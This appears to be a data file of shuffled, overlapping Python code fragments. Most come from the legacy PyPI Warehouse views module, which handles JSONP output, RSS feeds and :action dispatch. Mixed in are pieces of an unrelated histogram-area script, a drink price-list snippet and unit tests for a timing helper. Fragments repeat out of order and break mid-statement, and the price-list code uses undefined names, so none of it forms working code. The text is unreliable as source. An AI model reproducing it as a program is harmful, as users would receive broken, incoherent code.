"if callback is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise",
"@register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"no releases\".format(project_name)) version = versions[0] elif version not in versions: raise NotFound(\"{} has",
"xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods =",
"an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO",
"fn return deco def pypi(app, request): # check for the legacy :action-style dispatch",
"pypi(app, request): # check for the legacy :action-style dispatch action = request.args.get(':action') if",
"= render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml;",
"JSONP extra crap if necessary if callback: data = '/**/ %s(%s);' % (callback,",
"fastly from warehouse.helpers import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"days' updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in",
"least we redirect to where it # moved to return redirect( url_for( request,",
"= request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name') #",
"= app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to _external when",
"\"\"\"Register a handler for a legacy :action style dispatch. Most of the dispatch",
"style dispatch. Most of the dispatch in legacy PyPI was implemented using a",
"in legacy PyPI was implemented using a :action parameter in the GET or",
"\"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw",
"# # Unless required by applicable law or agreed to in writing, software",
"# limitations under the License. import json import time from werkzeug.utils import redirect",
"dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in",
"express or implied. # See the License for the specific language governing permissions",
"callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback name')",
"release in releases: # TODO update _force_external to _external when Flask-ification is done",
"_action_methods[action](app, request) # No :action means we render the index, or at least",
"cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for a legacy",
"N days' new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for",
"any way, it simply registers it with the legacy routing mapping. \"\"\" if",
"either express or implied. # See the License for the specific language governing",
"RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update",
"in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request)",
"# fail early if callback is invalid callback = request.args.get('callback') if callback: if",
"'text/xml; charset=utf-8' # TODO: throw in a last-modified header too? return response @register('packages_rss')",
"def register(name): \"\"\"Register a handler for a legacy :action style dispatch. Most of",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"import xmlrpc from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods",
"@fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if callback is invalid",
"description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in",
"_external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response",
"_action_methods = {} def register(name): \"\"\"Register a handler for a legacy :action style",
"code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors",
"action in _action_methods: return _action_methods[action](app, request) # No :action means we render the",
"cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for a",
"= url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new",
"GET or POST arguments. This doesn't actually decorate the function or alter it",
"in the GET or POST arguments. This doesn't actually decorate the function or",
"the License. # You may obtain a copy of the License at #",
"as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: #",
"2013 <NAME> # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"or at least we redirect to where it # moved to return redirect(",
"varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates as an",
"response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days'",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls",
"@cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if callback",
"response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days'",
"raise BadRequest('invalid JSONP callback name') # Get the real project name for this",
"function or alter it in any way, it simply registers it with the",
"the JSONP extra crap if necessary if callback: data = '/**/ %s(%s);' %",
"raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d =",
"not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app,",
"done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request,",
"Get the real project name for this project project = app.db.packaging.get_project(project_name) if project",
"fail early if callback is invalid callback = request.args.get('callback') if callback: if not",
"redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import",
"with the License. # You may obtain a copy of the License at",
"return _action_methods[action](app, request) # No :action means we render the index, or at",
"in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app,",
"limitations under the License. import json import time from werkzeug.utils import redirect from",
"not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not",
"fn return fn return deco def pypi(app, request): # check for the legacy",
"= '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in",
"{} def register(name): \"\"\"Register a handler for a legacy :action style dispatch. Most",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"_action_methods[name] = fn return fn return deco def pypi(app, request): # check for",
"@cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if",
"an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO",
"BadRequest('invalid JSONP callback name') # Get the real project name for this project",
"import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name):",
"from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from",
"project is None: raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the",
"@fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new projects as an",
"law or agreed to in writing, software # distributed under the License is",
"legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request)",
"the License for the specific language governing permissions and # limitations under the",
"import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response from warehouse.utils import",
"under the License. import json import time from werkzeug.utils import redirect from werkzeug.exceptions",
"% (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline'",
"the GET or POST arguments. This doesn't actually decorate the function or alter",
"governing permissions and # limitations under the License. import json import time from",
"the function or alter it in any way, it simply registers it with",
"we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None:",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{}",
"app.db.packaging.get_project_versions(project['name']) if version is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name))",
"return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N",
"% (name, )) def deco(fn): _action_methods[name] = fn return fn return deco def",
"callback name') # Get the real project name for this project project =",
"to where it # moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301,",
"@cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last N days' new projects",
"\"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response,",
"the latest version versions = app.db.packaging.get_project_versions(project['name']) if version is None: if not versions:",
"to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response",
"elif version not in versions: raise NotFound(\"{} has no release {}\".format(project_name, version)) rpc",
"import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers",
"new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in",
"raise NotFound(\"{} does not exist\".format(project_name)) # we're looking for the latest version versions",
"NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for from warehouse.http import",
"extra crap if necessary if callback: data = '/**/ %s(%s);' % (callback, data)",
"mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt to re-register name %r' %",
"it in any way, it simply registers it with the legacy routing mapping.",
"render the index, or at least we redirect to where it # moved",
"in compliance with the License. # You may obtain a copy of the",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"updates as an RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases:",
":action style dispatch. Most of the dispatch in legacy PyPI was implemented using",
"url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\",",
"doesn't actually decorate the function or alter it in any way, it simply",
"simply registers it with the legacy routing mapping. \"\"\" if name in _action_methods:",
"@cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates as",
"See the License for the specific language governing permissions and # limitations under",
"it with the legacy routing mapping. \"\"\" if name in _action_methods: raise KeyError('Attempt",
"where it # moved to return redirect( url_for( request, \"warehouse.views.index\", ), code=301, )",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"for this project project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does",
"feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external",
"= app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update _force_external to _external when",
"days' new projects as an RSS feed. \"\"\" releases = app.db.packaging.get_recent_projects(num=40) for release",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"import url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import",
"= 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request):",
"import time from werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse",
"to re-register name %r' % (name, )) def deco(fn): _action_methods[name] = fn return",
"werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for from",
"(name, )) def deco(fn): _action_methods[name] = fn return fn return deco def pypi(app,",
"version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site,",
"too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss def packages_rss(app, request): \"\"\"Dump the last",
"re-register name %r' % (name, )) def deco(fn): _action_methods[name] = fn return fn",
"'/**/ %s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition']",
"_action_methods: return _action_methods[action](app, request) # No :action means we render the index, or",
"%s(%s);' % (callback, data) serial = app.db.packaging.get_last_serial() response = Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] =",
"render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register",
"= time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request,",
"callback is invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid",
"does not exist\".format(project_name)) # we're looking for the latest version versions = app.db.packaging.get_project_versions(project['name'])",
"dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) # No",
"NotFound(\"{} has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict(",
"parameter in the GET or POST arguments. This doesn't actually decorate the function",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"url_for from warehouse.http import Response from warehouse.legacy import xmlrpc from warehouse.templates import render_response",
"app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' #",
"url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra crap",
"in releases: # TODO update _force_external to _external when Flask-ification is done url",
"urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url in d['urls']: url['upload_time'] =",
"to _external when Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], _force_external=True) release.update(dict(url=url))",
"release.update(dict(url=url)) response = render_response( app, request, \"legacy/rss.xml\", description='new projects', releases=releases, site=app.config.site, ) response.mimetype",
"project_name, version=None): # fail early if callback is invalid callback = request.args.get('callback') if",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from warehouse.helpers import url_for",
"return deco def pypi(app, request): # check for the legacy :action-style dispatch action",
"legacy :action style dispatch. Most of the dispatch in legacy PyPI was implemented",
"a legacy :action style dispatch. Most of the dispatch in legacy PyPI was",
"for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write",
"if version is None: if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version",
"urls: url['upload_time'] = url['upload_time'].strftime(time_format) data = json.dumps(d, sort_keys=True) # write the JSONP extra",
"TODO: throw in a last-modified header too? return response @register('packages_rss') @cache(browser=1, varnish=120) @fastly.rss",
"for the legacy :action-style dispatch action = request.args.get(':action') if action in _action_methods: return",
"no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version),",
"invalid callback = request.args.get('callback') if callback: if not is_valid_json_callback_name(callback): raise BadRequest('invalid JSONP callback",
"write the JSONP extra crap if necessary if callback: data = '/**/ %s(%s);'",
"@fastly.rss def rss(app, request): \"\"\"Dump the last N days' updates as an RSS",
"release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'],",
"response = render_response( app, request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype =",
"from warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {}",
"\"\"\"Dump the last N days' updates as an RSS feed. \"\"\" releases =",
"request, \"legacy/rss.xml\", description='package updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO:",
"def pypi(app, request): # check for the legacy :action-style dispatch action = request.args.get(':action')",
"json.dumps(d, sort_keys=True) # write the JSONP extra crap if necessary if callback: data",
"updates', releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a",
"the specific language governing permissions and # limitations under the License. import json",
"in d['urls']: url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in",
"has no release {}\".format(project_name, version)) rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'],",
"werkzeug.utils import redirect from werkzeug.exceptions import NotFound, BadRequest from warehouse import fastly from",
"Flask-ification is done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response =",
"varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None): # fail early if callback is",
"releases=releases, site=app.config.site, ) response.mimetype = 'text/xml; charset=utf-8' # TODO: throw in a last-modified",
"Response(data, mimetype=\"application/json\") response.headers['Content-Disposition'] = 'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss",
"= dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), ) time_format = '%Y-%m-%dT%H:%M:%S' for url",
"done url = url_for(request, 'warehouse.packaging.views.project_detail', project_name=release['name'], version=release['version'], _force_external=True) release.update(dict(url=url)) response = render_response( app,",
"if not versions: raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version",
"warehouse.templates import render_response from warehouse.utils import cache, cors, is_valid_json_callback_name _action_methods = {} def",
"'inline' response.headers.add(\"X-PyPI-Last-Serial\", serial) return response @register('rss') @cache(browser=1, varnish=120) @fastly.rss def rss(app, request): \"\"\"Dump",
"RSS feed. \"\"\" releases = app.db.packaging.get_recently_updated(num=40) for release in releases: # TODO update",
"PyPI was implemented using a :action parameter in the GET or POST arguments.",
"url['upload_time'] = url['upload_time'].strftime(time_format) for release, urls in d['releases'].items(): for url in urls: url['upload_time']",
"rpc = xmlrpc.Interface(app, request) d = dict( info=rpc.release_data(project['name'], version), urls=rpc.release_urls(project['name'], version), releases=rpc.all_release_urls(project['name']), )",
"dispatch in legacy PyPI was implemented using a :action parameter in the GET",
"url_for( request, \"warehouse.views.index\", ), code=301, ) def daytime(app, request): response = time.strftime(\"%Y%m%dT%H:%M:%S\\n\", time.gmtime(time.time()))",
"release, urls in d['releases'].items(): for url in urls: url['upload_time'] = url['upload_time'].strftime(time_format) data =",
":action means we render the index, or at least we redirect to where",
":action-style dispatch action = request.args.get(':action') if action in _action_methods: return _action_methods[action](app, request) #",
"raise NotFound(\"{} has no releases\".format(project_name)) version = versions[0] elif version not in versions:",
"releases = app.db.packaging.get_recent_projects(num=40) for release in releases: # TODO update _force_external to _external",
"%r' % (name, )) def deco(fn): _action_methods[name] = fn return fn return deco",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"time.gmtime(time.time())) return Response(response, mimetype=\"text/plain\") @cors @cache(browser=1, varnish=120) @fastly.projects(project_name=\"project\") def project_json(app, request, project_name, version=None):",
"dispatch. Most of the dispatch in legacy PyPI was implemented using a :action",
"or alter it in any way, it simply registers it with the legacy",
"in _action_methods: return _action_methods[action](app, request) # No :action means we render the index,",
"request): # check for the legacy :action-style dispatch action = request.args.get(':action') if action",
"import cache, cors, is_valid_json_callback_name _action_methods = {} def register(name): \"\"\"Register a handler for",
"register(name): \"\"\"Register a handler for a legacy :action style dispatch. Most of the",
"project = app.db.packaging.get_project(project_name) if project is None: raise NotFound(\"{} does not exist\".format(project_name)) #"
] |
[
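The register/pypi pair above is the whole legacy dispatch mechanism: handlers are keyed by the :action query parameter and looked up in _action_methods. A minimal sketch of how a new handler would plug in (the 'ping' action and its body are illustrative, not part of the original module):

@register('ping')
def ping(app, request):
    # a request to /pypi?:action=ping would be routed here by pypi()
    return Response('pong', mimetype='text/plain')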
"for j in range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j",
"= int(input()) h = list(map(int, input().split())) ans = 0 for i in range(n):",
"= 0 for i in range(n): min_height = h[i] for j in range(i,",
"n = int(input()) h = list(map(int, input().split())) ans = 0 for i in",
"min(min_height, h[j]) ans = max(ans, (j - i + 1) * min_height) print(ans)",
"in range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j - i",
"min_height = min(min_height, h[j]) ans = max(ans, (j - i + 1) *",
"= list(map(int, input().split())) ans = 0 for i in range(n): min_height = h[i]",
"in range(n): min_height = h[i] for j in range(i, n): min_height = min(min_height,",
"= h[i] for j in range(i, n): min_height = min(min_height, h[j]) ans =",
"input().split())) ans = 0 for i in range(n): min_height = h[i] for j",
"min_height = h[i] for j in range(i, n): min_height = min(min_height, h[j]) ans",
"range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j - i +",
"i in range(n): min_height = h[i] for j in range(i, n): min_height =",
"= min(min_height, h[j]) ans = max(ans, (j - i + 1) * min_height)",
"h = list(map(int, input().split())) ans = 0 for i in range(n): min_height =",
"list(map(int, input().split())) ans = 0 for i in range(n): min_height = h[i] for",
"n): min_height = min(min_height, h[j]) ans = max(ans, (j - i + 1)",
"j in range(i, n): min_height = min(min_height, h[j]) ans = max(ans, (j -",
"h[i] for j in range(i, n): min_height = min(min_height, h[j]) ans = max(ans,",
"ans = 0 for i in range(n): min_height = h[i] for j in",
"range(n): min_height = h[i] for j in range(i, n): min_height = min(min_height, h[j])",
"for i in range(n): min_height = h[i] for j in range(i, n): min_height",
"int(input()) h = list(map(int, input().split())) ans = 0 for i in range(n): min_height",
"0 for i in range(n): min_height = h[i] for j in range(i, n):",
"<reponame>cnsteven/online-judge n = int(input()) h = list(map(int, input().split())) ans = 0 for i"
] |
[
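The nested loop scans every subarray, so this solution is O(n²). Assuming the task is the classic largest-rectangle-in-a-histogram problem (which the (j - i + 1) * min_height objective suggests), a monotonic stack brings it down to O(n); a sketch:

def largest_rectangle(h):
    stack = []  # indices of bars, heights kept increasing
    best = 0
    for i, height in enumerate(h + [0]):  # sentinel 0 flushes the stack
        while stack and h[stack[-1]] >= height:
            top = stack.pop()
            left = stack[-1] + 1 if stack else 0
            best = max(best, h[top] * (i - left))
        stack.append(i)
    return best

Each index is pushed and popped at most once, which is where the linear bound comes from.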
"drink price list prices = {coke: 2, beer: 2.5, water: 0, juice: 2}",
"price list prices = {coke: 2, beer: 2.5, water: 0, juice: 2} print(price('beer'))",
"# drink price list prices = {coke: 2, beer: 2.5, water: 0, juice:"
] |
[
"def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1})",
"-*- import unittest from time import sleep import numpy as np from bigo_test.assertions.helpers",
"execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if",
"np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func)",
"numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint:",
"x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1,",
"pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers,",
"from time import sleep import numpy as np from bigo_test.assertions.helpers import execution_timer def",
"times = execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func",
"1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def",
"execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class TestHelpers(unittest.TestCase):",
"func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2,",
"np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n)",
"times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]),",
"= execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1,",
"class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x:",
"options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)",
"def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\":",
"import numpy as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): #",
"x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]),",
"coding: utf-8 -*- import unittest from time import sleep import numpy as np",
"decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\":",
"execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1]))",
"import unittest from time import sleep import numpy as np from bigo_test.assertions.helpers import",
"\"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func =",
"test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers,",
"times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers,",
"options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__",
"= execution_timer(func) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func =",
"\"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) if __name__ == \"__main__\":",
"# -*- coding: utf-8 -*- import unittest from time import sleep import numpy",
"as np from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument",
"test_func_factory(1) numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times,",
"np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times = execution_timer(func) np.testing.assert_array_equal(numbers,",
"np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times = execution_timer(func,",
"= test_func_factory(1) numbers, times = execution_timer(func, lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1,",
"1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_maximum_n_lesser_than_minimum_n(self): func = test_func_factory(1) numbers, times =",
"np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers,",
"func class TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda",
"from bigo_test.assertions.helpers import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return",
"TestHelpers(unittest.TestCase): def test_execution_timer(self): func = test_func_factory(1) numbers, times = execution_timer(func, lambda x: x,",
"numbers, times = execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1,",
"= execution_timer(func, options={\"minimum_n\": 2, \"maximum_n\": 1}) np.testing.assert_array_equal(numbers, np.array([2, 2])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)",
"np.array([1, 1])) np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1) def test_execution_timer_defaults(self): func = test_func_factory(1) numbers, times",
"lambda x: x, options={\"minimum_n\": 1, \"maximum_n\": 1, \"n_count\": 2}) np.testing.assert_array_equal(numbers, np.array([1, 1])) np.testing.assert_almost_equal(times,",
"import execution_timer def test_func_factory(n): def func(a): # pylint: disable=unused-argument sleep(n) return func class",
